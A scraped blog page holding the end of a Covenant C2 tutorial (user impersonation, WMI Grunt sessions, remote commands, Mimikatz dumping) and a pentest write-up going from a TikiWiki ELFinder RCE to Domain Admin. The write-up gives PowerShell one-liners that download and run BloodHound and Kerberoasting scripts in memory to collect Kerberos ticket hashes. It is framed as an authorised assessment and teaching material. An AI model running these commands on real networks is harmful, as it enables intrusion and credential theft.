/></a></div><br />We have a Domain user with name 'Administrator' which is logged-in to the current machine: <br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinyrlS_OWbGQPb6PshZpT3HEDFlFaAw7WIza5n_3g3nDFojyILDPGS2Rdp14v5Msq6o9A4qY4YBLuQMUUyYLFFaxV8PAM0RW2fXaIbazDy5vrf4sYCx705uR9vnKbdBbl47ZaSWCkuUadV94OdsG88naYQmT-kAb8do9vDaeCLQoTVHYCPotA-95xc/s636/36.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="636" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinyrlS_OWbGQPb6PshZpT3HEDFlFaAw7WIza5n_3g3nDFojyILDPGS2Rdp14v5Msq6o9A4qY4YBLuQMUUyYLFFaxV8PAM0RW2fXaIbazDy5vrf4sYCx705uR9vnKbdBbl47ZaSWCkuUadV94OdsG88naYQmT-kAb8do9vDaeCLQoTVHYCPotA-95xc/s16000/36.png" /></a></div><br />To impersonate this user, use below mentioned command:<p></p><p><textarea style="height: 28px; margin: 0px; width: 400px;">ImpersonateUser /username:"Domain_name\user_name"</textarea></p><p>which will be like this in my case</p><p><textarea style="height: 28px; margin: 0px; width: 400px;">ImpersonateUser /username:"DC01\Administrator"</textarea></p><p>By executing the <b><span style="color: white;">WhoAmI</span></b> command, we can see that we have impersonated user Administrator successfully:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX-KKvaDGRbGkMRtIpsjWdExNdjpYeCaVpFppP8vB8_IyyicIupRPxhT6zMfbsohQoX2D8BBwdQXtRVxe2uXvOs2sUO9OxORmNcuxOquufPzcerD4VG1Osjy0TAVOMO-SnMxbdlRGhlUnbgdM51c9ts_lE1J9abDUDrNO_jKodCMJzc5ySnhcwe_7a/s555/37.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="299" data-original-width="555" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX-KKvaDGRbGkMRtIpsjWdExNdjpYeCaVpFppP8vB8_IyyicIupRPxhT6zMfbsohQoX2D8BBwdQXtRVxe2uXvOs2sUO9OxORmNcuxOquufPzcerD4VG1Osjy0TAVOMO-SnMxbdlRGhlUnbgdM51c9ts_lE1J9abDUDrNO_jKodCMJzc5ySnhcwe_7a/s16000/37.png" /></a></div><p>Now, to get a Grunt session as <span style="color: white;">Administrator</span> user, execute below mentioned command using impersonated user session:</p><p><textarea style="height: 28px; margin: 0px; width: 250px;">WMIGrunt localhost powershell</textarea></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-zCq7tTN7g0iYGcbUnRdg1WlMfuieo71OG2U3tU617cXW7g15tM4tOQaVTimHPATY3oleCr5vvR5zBXxNbydeVaNS23ZYRlPZz11qldsyrcbry7HSl7xdS1jR5OZ_Lm4mqUU-m5BDC8T1MzF0eOw1eRb0cr7f8Xo3Gw0jsiq0JzkHwVZkYF8U7vF/s709/40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="294" data-original-width="709" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-zCq7tTN7g0iYGcbUnRdg1WlMfuieo71OG2U3tU617cXW7g15tM4tOQaVTimHPATY3oleCr5vvR5zBXxNbydeVaNS23ZYRlPZz11qldsyrcbry7HSl7xdS1jR5OZ_Lm4mqUU-m5BDC8T1MzF0eOw1eRb0cr7f8Xo3Gw0jsiq0JzkHwVZkYF8U7vF/s16000/40.png" /></a></div><br /><p></p><p>And we will have a new session with the privilege of impersonated user:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U5JDs8rrabhpsFFgd4E5ukSPwo_wyJBHl1-hKKoscyNUUilkXjNoGDCXc4pZguOxDAkFD0tNvzmbY_AccIdLbLCwRgSF8Cub98QQ1Pce9aJ_NswW65_-TBLBtEb1EvpfTv0mDsd-jOh5btM_hN4aAEWuB4L8c6Xs-bNHrvAB1Xzwx4yuGGojvIjs/s1485/39.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="456" data-original-width="1485" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U5JDs8rrabhpsFFgd4E5ukSPwo_wyJBHl1-hKKoscyNUUilkXjNoGDCXc4pZguOxDAkFD0tNvzmbY_AccIdLbLCwRgSF8Cub98QQ1Pce9aJ_NswW65_-TBLBtEb1EvpfTv0mDsd-jOh5btM_hN4aAEWuB4L8c6Xs-bNHrvAB1Xzwx4yuGGojvIjs/s16000/39.png" /></a></div><p>Using newly created session, we can execute command to move laterally (if this user has access to other machine).</p><p>For example, this user has local admin privilege on another machine, command execution is possible. To list the user account on remote machine, executing <span style="color: white;">"net user"</span> command using <b><span style="color: white;">PowerShellRemotingCommand</span></b> Task:</p><textarea style="height: 28px; margin: 0px; width: 530px;">PowerShellRemotingCommand REMOTE_MACHINE_HOSTNAME /command:"OS_COMMAND"</textarea><p>in my case it was:</p><textarea style="height: 28px; margin: 0px; width: 450px;">PowerShellRemotingCommand WIN-A08PEI13CFI /command:"net user"</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMKoaEWhwwuwJk1-5Hg3_h-NnuToK7AeeJV313VhMBR1EEf7t2pNduI3-PA55suNyggOiTIofYuaJQeuEBdnnHWdnFWwIa2ui-X8M1ALHDXwt7pD9jnv6MKtkI2rC4yvNiX9AbXJ5BrJ5cbUjUeFICkyg9TViZACiOkDIqWXHbeCDEMKUrAuAHkOrv/s1221/41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMKoaEWhwwuwJk1-5Hg3_h-NnuToK7AeeJV313VhMBR1EEf7t2pNduI3-PA55suNyggOiTIofYuaJQeuEBdnnHWdnFWwIa2ui-X8M1ALHDXwt7pD9jnv6MKtkI2rC4yvNiX9AbXJ5BrJ5cbUjUeFICkyg9TViZACiOkDIqWXHbeCDEMKUrAuAHkOrv/s16000/41.png" /></a></div><br />Or using <b><span style="color: white;">WMICommand</span></b> Task<p></p><textarea style="height: 28px; margin: 0px; width: 600px;"> WMICommand /computername:"REMOTE_MACHINE_HOSTNAME" /command:"OS_Command"</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWde0cVvmGBr5Nn1-681p4sIOQ5QVxl5kL2s9zGLp_wSpeuJl7cgoOpSFltwI2lLpxD7vh-SkuJddxH6S4EIMn3RUloz1_RqKDbIjX_Vp3dNmb9ZghKUfgopvPeXgRvma8l-Fg4fid9Ih3TAjd1ehThW_9HJ-kfiFl05HchHrigwlJG3WHAWRZXz2J/s991/42.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="394" data-original-width="991" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWde0cVvmGBr5Nn1-681p4sIOQ5QVxl5kL2s9zGLp_wSpeuJl7cgoOpSFltwI2lLpxD7vh-SkuJddxH6S4EIMn3RUloz1_RqKDbIjX_Vp3dNmb9ZghKUfgopvPeXgRvma8l-Fg4fid9Ih3TAjd1ehThW_9HJ-kfiFl05HchHrigwlJG3WHAWRZXz2J/s16000/42.png" /></a></div>We can even get reverse shell or Grunt session from this remote machine (will demonstrate in next blog post)<br /><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">3. Dumping NTLM/Plaintext password of logged-in/local user account</span></span></span></h3><p></p><p> This is simple one, we just need to use <b><span style="color: white;">Mimikatz</span></b> Task:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVM0QLo26-SBt881ncFbkZRxOzmC7CjK0nhPGlrDCp8HxYbNjGRFn9EH6rv4rc8l6NTuOpgRxk2QJB0dbGYpvMj1DdthXEbvjXuPRRzlxBAixwva1P74UW3fCuRXQoUyM0FSCbSMs_D59GWdIl3GF1AUIxmyH7mPHePC8Z6LNHTyjuCDtJYWCfjq8w/s560/43.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="406" data-original-width="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVM0QLo26-SBt881ncFbkZRxOzmC7CjK0nhPGlrDCp8HxYbNjGRFn9EH6rv4rc8l6NTuOpgRxk2QJB0dbGYpvMj1DdthXEbvjXuPRRzlxBAixwva1P74UW3fCuRXQoUyM0FSCbSMs_D59GWdIl3GF1AUIxmyH7mPHePC8Z6LNHTyjuCDtJYWCfjq8w/s16000/43.png" /></a></div><p></p><p>And there we go ......</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMlJssg8SAI_ho7W-ne3Bq_onFiDbPm0VlyPD7gmMkLF21OWtf20QBQLVXvXNYdunwaFgZgT1kTUmG33EvJYsbTMfwh1evMjFRAh7bSZGkFbU72Fc8wStvY_z5oGWa2wcG2UzNd09WmTF2GozzdICCyOwKBKR8iJBRCNrhy1hHLqcHcQ6GVitvOUz/s787/44.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="749" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMlJssg8SAI_ho7W-ne3Bq_onFiDbPm0VlyPD7gmMkLF21OWtf20QBQLVXvXNYdunwaFgZgT1kTUmG33EvJYsbTMfwh1evMjFRAh7bSZGkFbU72Fc8wStvY_z5oGWa2wcG2UzNd09WmTF2GozzdICCyOwKBKR8iJBRCNrhy1hHLqcHcQ6GVitvOUz/s16000/44.png" /></a></div></div><div><br /><p></p><p></p><p></p></div><div><p>Thanks for reading.</p><p><br />Special thanks to: - Burcu YARAR, <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, vivek chauhan, Manoj and <a href="https://twitter.com/5h4d0w_hun73r">Karan</a><br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div><span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
<div><div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, </code></div><div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, </code></div><div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#Golden boy INDIA, Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji,Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
</div><div><br /><p></p><p></p><p></p></div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-23375052082877553242021-03-20T23:01:00.006+05:302023-11-23T10:32:09.742+05:30From TikiWiki to Domain Admin - Journey to pwning a company<p> <br />In this blog post, I am going to discuss about the scenario of an assessment. Goal of the assessment was to test the overall posture of the network security from the prospective of an external attacker. <br /><span></span></p><a name='more'></a>IP range was provided to perform the external pentest.<br />Nessus scan result was not useful.<br /><br /><span style="color: white;"><span style="font-size: large;">Reverse Domain lookup</span></span><br />After trying Nessus scan, focused on manual stuff. <br />First preference was to enumerate the domain names hosted on the In-scope IPs.<br />Like always, Bing helped to find out the domain name mapped to those IPs. <p></p><p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDkddQnEIS9IA6tFv5ZcNY6b1t-fp4ZDOY9qxMhoLKbnGANs7qlbKH6E2C3S3kk7tysUPLnaKK-QprTzKoiFIf_tPb5l8eOrrCiUPYIB0-WqWlpzZf6RJi8Nr1RqJoR3ss3Y8C3LKfBn4/s1132/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="348" data-original-width="1132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDkddQnEIS9IA6tFv5ZcNY6b1t-fp4ZDOY9qxMhoLKbnGANs7qlbKH6E2C3S3kk7tysUPLnaKK-QprTzKoiFIf_tPb5l8eOrrCiUPYIB0-WqWlpzZf6RJi8Nr1RqJoR3ss3Y8C3LKfBn4/s16000/1.png" /></a></div><br /><p><span style="color: white;"><span style="font-size: large;">Discovery of Vulnerable Plugin</span></span><br />The moment, Bing showed the ULR, unknown memory in my mind pointed the keyword "TikiWiki" CMS.<br />It was because of the URL "wiki/tiki-login_scr.php". <br />I searched on google for "TikiWiki" Remote Code execution exploit. I got bunch of exploits and one was interesting to me as it was unauthenticated one. Vulnerability was in third party plugin "ELFinder" Version 2.0. </p><p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6MfeLwdWwT0_3XOQyJo7k9jrowYeSJdv0W0zZkrx2mkrk74hjkRpMrlbm-TMw56E3Z9LyxsqkI0Tecc1gz5Utcsyv7d3KGm6_H0wn54dI4lI6OXNzAWY1YS0ZFq9821vuZUNquznlxkM/s1366/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="198" data-original-width="1366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6MfeLwdWwT0_3XOQyJo7k9jrowYeSJdv0W0zZkrx2mkrk74hjkRpMrlbm-TMw56E3Z9LyxsqkI0Tecc1gz5Utcsyv7d3KGm6_H0wn54dI4lI6OXNzAWY1YS0ZFq9821vuZUNquznlxkM/s16000/2.png" /></a></div><br /><p><span style="color: white;"><span style="font-size: large;">Exploitation attempt</span></span><br />Metasploit module was available for the vulnerability<br /><a href="https://www.exploit-db.com/exploits/40091">https://www.exploit-db.com/exploits/40091</a><br /><br />After going through the Metasploit exploit module, I figured out that first MSF will check version of plugin by accessing the HTML file "web.com/vendor_extra/elfinder/elfinder.html". Once MSF confirm that the version of plugin is 2.0, it will fire the payload to PHP file "vendor_extra/elfinder/php/connector.minimal.php" <br /><br />We tried the Metasploit module but failed with error message "Connection reset by peer".</p><p></p><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qnQeN7aJ8wiLSnVkxXrnrMPn7G410RLNm3xQPfjp2b4J5h7LS7n85KYLrNQGcfRfPxEVGipZ0npJJRe_-dF0vZP1tqcBRPZI-bKcvZrl6ciUIK1MaQvW5aM92y1kR1B1U2ZhaMR7rGU/s1637/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1637" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qnQeN7aJ8wiLSnVkxXrnrMPn7G410RLNm3xQPfjp2b4J5h7LS7n85KYLrNQGcfRfPxEVGipZ0npJJRe_-dF0vZP1tqcBRPZI-bKcvZrl6ciUIK1MaQvW5aM92y1kR1B1U2ZhaMR7rGU/s16000/3.png" /></a></div><br /> This error message actually was actually hinting us to try manual approach. <br /><p></p><p>Now we tried with manual approach and prepared the HTTP POST request body in Burp Suite.<br />This time, we followed below mentioned one:<br /><a href="https://www.exploit-db.com/exploits/40053">https://www.exploit-db.com/exploits/40053</a><br /><br />crafted the HTTP POST body with command execution function "system" and triggered the request.<br />It worked and we checked, PHP script was created on server successfully.</p><p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_DsBI3_bzdlcLt7cXSvbLEYxrzBrnY6ERvSaG_rn95yqw0K08rPGglO0d6R2dBFO5RepFyVqfstT_K0o6pItQpAGIUfxXmUZuMc7wGECcxFs1v7QqNZwMMdOauGJIE1ya7dz041X0DvA/s1631/4.1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="698" data-original-width="1631" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_DsBI3_bzdlcLt7cXSvbLEYxrzBrnY6ERvSaG_rn95yqw0K08rPGglO0d6R2dBFO5RepFyVqfstT_K0o6pItQpAGIUfxXmUZuMc7wGECcxFs1v7QqNZwMMdOauGJIE1ya7dz041X0DvA/s16000/4.1.png" /></a></div><br /><p><br />Now, uploaded PHP web shell as well to gain access on server.<br /><br /><br /><span style="color: white;"><span style="font-size: large;">PHP Web shell user access issue</span></span><br />Once Web shell access achieved, executed "systeminfo" and "whoami" command to check the environment and current user privilege.<br /><br />Systeminfo returned the output and value of "Domain" in output showed that machine is member of organization's Active directory Domain.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5RUMLhU934dhQoN7WQ4FfiEPyfF9JvFGIdIrIG05FTBln1zz60uNp6aTs8_DpUHAiT6FUVQ7x_cCVBb28GnCUB_lpkx4NLKzuarHFEPECXTV5nKgOaAquGsP2lncjEDZGD2Bkc9jSfZg/s1093/4.5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="496" data-original-width="1093" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5RUMLhU934dhQoN7WQ4FfiEPyfF9JvFGIdIrIG05FTBln1zz60uNp6aTs8_DpUHAiT6FUVQ7x_cCVBb28GnCUB_lpkx4NLKzuarHFEPECXTV5nKgOaAquGsP2lncjEDZGD2Bkc9jSfZg/s16000/4.5.png" /></a></div><br /> <br />Whoami command showed web shell is running with "IIS_IUSRS" user privilege.<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmEIzgdM2jdumNOwWsSiXr4E0aadW2sSWoHpwNdkBSIY6lthjdRLtvKirJjVYpwTu5uI6VJXxuInQJbszFPDY87_867WkE4uKmE4S0B1OJb6mH1vsWsn3M7ZBdHewUH4Jbz-dR9TIELU/s1192/4.2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="293" data-original-width="1192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmEIzgdM2jdumNOwWsSiXr4E0aadW2sSWoHpwNdkBSIY6lthjdRLtvKirJjVYpwTu5uI6VJXxuInQJbszFPDY87_867WkE4uKmE4S0B1OJb6mH1vsWsn3M7ZBdHewUH4Jbz-dR9TIELU/s16000/4.2.png" /></a></div><br /><p>At that point of time, next step was to run bloodhound script and Kerberoasting script.<br />But current user was not able to communicate to domain controller machine to perform kerberoasting or to gather the information. <br /><br />I had cleared my mind and started correlating the things:<br />1. Web server is IIS<br />2. .NET is installed (Windows machine)<br />3. ASP webshell may have different privilege (NT AUTHORITY\NETWORK SERVICE etc)<br /><br />The moment I tried with ASPX webshell and checked output of "whoami" command, it was "NT AUTHORITY\NETWORK SERVICE". Tried with Powerview script to enumerate the list of DC machines and it worked like a charm.<br /></p><p style="text-align: center;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wgvVO26BmPt-22QppahovfvKarmqkuHcHvrewBwfZegyx4oo9NTZOkj1U1IGiHt5uJpal7Y_TMHlsZ9k-DKoEsG4uBv2jUqHU4dthUF8P8XvPiek5ImO_ijvDFiiIC50-uD_qvmklIY/s1126/5.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="1126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wgvVO26BmPt-22QppahovfvKarmqkuHcHvrewBwfZegyx4oo9NTZOkj1U1IGiHt5uJpal7Y_TMHlsZ9k-DKoEsG4uBv2jUqHU4dthUF8P8XvPiek5ImO_ijvDFiiIC50-uD_qvmklIY/s16000/5.jpeg" /></a></div><p>Again, I was in the game.<br /><br /><span style="color: white;"><span style="font-size: large;">Kerberoasting and data gathering using BloodHound </span></span><br />It was Windows 2008 server machine so ran both the PowerShell scripts "in-Memory" and got the data.<br />For more information regarding Kerberoasting, please visit <a href="https://adsecurity.org/?p=3458">https://adsecurity.org/?p=3458</a><br /></p><p>BloodHound PowerShell script to gather the info from AD<br /></p><blockquote>powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/incredibleindishell/Windows-AD-environment-related/master/Blood_Hound/bps_in.ps1'); Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV </blockquote><br />Kerberoasting PowerShell script to grab the "Kerberos TGS Ticket"<p></p><p><br /></p><blockquote>powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty hash | Out-File -filepath ticket_b0x.txt </blockquote> <br />Once BloodHound script gathered the data from Active directory, uploaded the ZIP file to Local BloodHound console. <br />In console, checked the the possibilities to gain Domain Admin user privilege from Kerberoastable user.<br />BloodHound showed that there are few users which can lead to Domain Admin user access.<p></p><p style="text-align: center;"></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN8OkFSMjwWZ-Zes3ytuGNGEovV2NKU_SZEtN9Vv027EUi909UbBxI7O6NaUhn0zovC0Z2rLsv9voN3DBcp0WWeNCpJJmFkqF0M4FZJj6nVWU2FRyqcC_DolIV1krqNiW3WHJ7W5Z7pP8/s1898/bh.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="863" data-original-width="1898" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN8OkFSMjwWZ-Zes3ytuGNGEovV2NKU_SZEtN9Vv027EUi909UbBxI7O6NaUhn0zovC0Z2rLsv9voN3DBcp0WWeNCpJJmFkqF0M4FZJj6nVWU2FRyqcC_DolIV1krqNiW3WHJ7W5Z7pP8/s16000/bh.png" /></a></div><br /> Using Hashcat, tried with those specific users and got success after 1 day (Special Thanks to Ashwath Sir)<br /><br /><span style="color: white;"><span style="font-size: large;">HTTP Tunneling trick to access the internally hosted machines</span></span><br />Now, target was to access the Internal sensitive machines such as Domain Controller.<br />Perimeter firewall outbound connection rules blocked the reverse shell connection.<br />To overcome the issue, I used HTTP tunneling script developed by NCC group "A Black Path Toward The Sun"<br /><a href="https://github.com/nccgroup/ABPTTS">https://github.com/nccgroup/ABPTTS</a> <br /><br />Uploaded the ASPX script from ABTTS to the server. Started Python client script on my local machine and specified the DC Machine internal IP.<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqNA0p3cZYrUyWdGkfve5jG8sENm126aWCNw8vHg7DaNlTm4VkPWvFGE4pRI4mKsz5qYcVRqQYdFauyKC9WxBxcZz4uF5jhQ8aKVi5ZVQAjq99mwZPgGn4bgzMMuDD33NpqjctrGqSck/s1880/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="783" data-original-width="1880" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqNA0p3cZYrUyWdGkfve5jG8sENm126aWCNw8vHg7DaNlTm4VkPWvFGE4pRI4mKsz5qYcVRqQYdFauyKC9WxBxcZz4uF5jhQ8aKVi5ZVQAjq99mwZPgGn4bgzMMuDD33NpqjctrGqSck/s16000/7.png" /></a></div><p>ABTTS HTTP tunneling script accepted traffic from my local machin, passed it to ASPX script uploaded on compromised machine and ASPX script decrypted and passed the traffic to internal machine.<br /><br />This is how any internal machine was accessible on my localhost.<br /><br />Later, took advantage of over-broad ACL permissions to reach the Domain Admin user account.</p><p>Thanks for reading.</p><p><br />Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, vivek chauhan, Manoj and <a href="https://twitter.com/5h4d0w_hun73r">Karan</a>
<br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
